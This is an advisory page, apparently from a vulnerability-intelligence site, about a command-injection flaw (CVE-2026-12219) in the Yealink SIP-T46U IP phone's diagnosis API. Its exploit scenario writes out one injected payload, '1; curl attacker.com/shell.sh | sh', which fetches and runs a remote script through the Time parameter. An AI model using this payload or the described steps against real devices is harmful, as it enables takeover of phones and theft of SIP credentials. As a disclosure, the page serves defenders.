Skip to main content

Yealink SIP-T46U CVE-2026-12219

| EUVD-2026-36692 LOW
Command Injection (CWE-77)
2026-06-15 VulDB GHSA-85r6-756v-4x2v
Command Injection Sip T46U
2.1
CVSS 4.0 · Vendor: VulDB

Severity by source

Vendor (VulDB) PRIMARY
2.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Network-accessible API requires only low-privilege authentication; command injection on embedded Linux yields full OS access, warranting C:H/I:H/A:H.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS VectorVendor: VulDB

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 15, 2026 - 06:24 vuln.today
Severity Changed
Jun 15, 2026 - 06:22 NVD
MEDIUM LOW
CVSS changed
Jun 15, 2026 - 06:22 NVD
5.3 (MEDIUM) 2.1 (LOW)

DescriptionCVE.org

A flaw has been found in Yealink SIP-T46U 108.86.0.118. The impacted element is the function mod_diagnose.CommandShellByType of the file /api/diagnosis/start of the component Web FastCGI Service. This manipulation of the argument Time causes command injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Command injection in Yealink SIP-T46U firmware 108.86.0.118 enables remote authenticated attackers to execute arbitrary OS commands via the unsanitized Time argument passed to the mod_diagnose.CommandShellByType function at the /api/diagnosis/start diagnostic endpoint. The exploit leverages the Web FastCGI Service's failure to neutralize shell metacharacters before invoking underlying system commands, consistent with CWE-77. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain or guess low-privilege web credentials
Delivery
Send crafted HTTP POST to /api/diagnosis/start
Exploit
Inject OS commands via unsanitized Time parameter
Execution
mod_diagnose.CommandShellByType executes injected shell payload
Persist
Achieve arbitrary OS command execution on embedded Linux
Impact
Extract SIP credentials or establish persistent access
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated session with at least low-privilege access to the Yealink SIP-T46U web management interface, consistent with the CVSS PR:L metric. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 4.0 score of 2.1 (VC:L/VI:L/VA:L) appears to substantially understate real-world risk and is likely an artifact of conservative impact scoring by the VulDB reporter rather than a vendor-assessed rating. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privilege credentials to the Yealink SIP-T46U web interface - obtained via default credentials, credential stuffing, or insider access - sends a crafted HTTP POST request to `/api/diagnosis/start` with the `Time` parameter set to a value containing shell metacharacters (e.g., `1; curl attacker.com/shell.sh | sh`), causing `mod_diagnose.CommandShellByType` to execute the injected command as the FastCGI service user on the embedded Linux system. The publicly available PoC exploit archive (referenced at cdn2.v50to.cc) lowers the required skill level for exploitation. …
Remediation No vendor-released patch has been identified at time of analysis; the vendor did not respond to disclosure, and no patched firmware version is confirmed from available data. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-12218 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.87.50.1) allows adjacent-network attackers wi
CVE-2026-12220 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.86.0.118) allows adjacent-network attackers w
CVE-2026-12221 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.86.0.118) allows adjacent-network attackers w
CVE-2026-12222 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.86.0.118) allows authenticated adjacent-netwo
CVE-2026-12223 LOW POC
2.0 Jun 15

Command injection in the Yealink SIP-T46U IP phone firmware 108.86.0.118 enables authenticated, adjacent-network attacke

Share

CVE-2026-12219 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy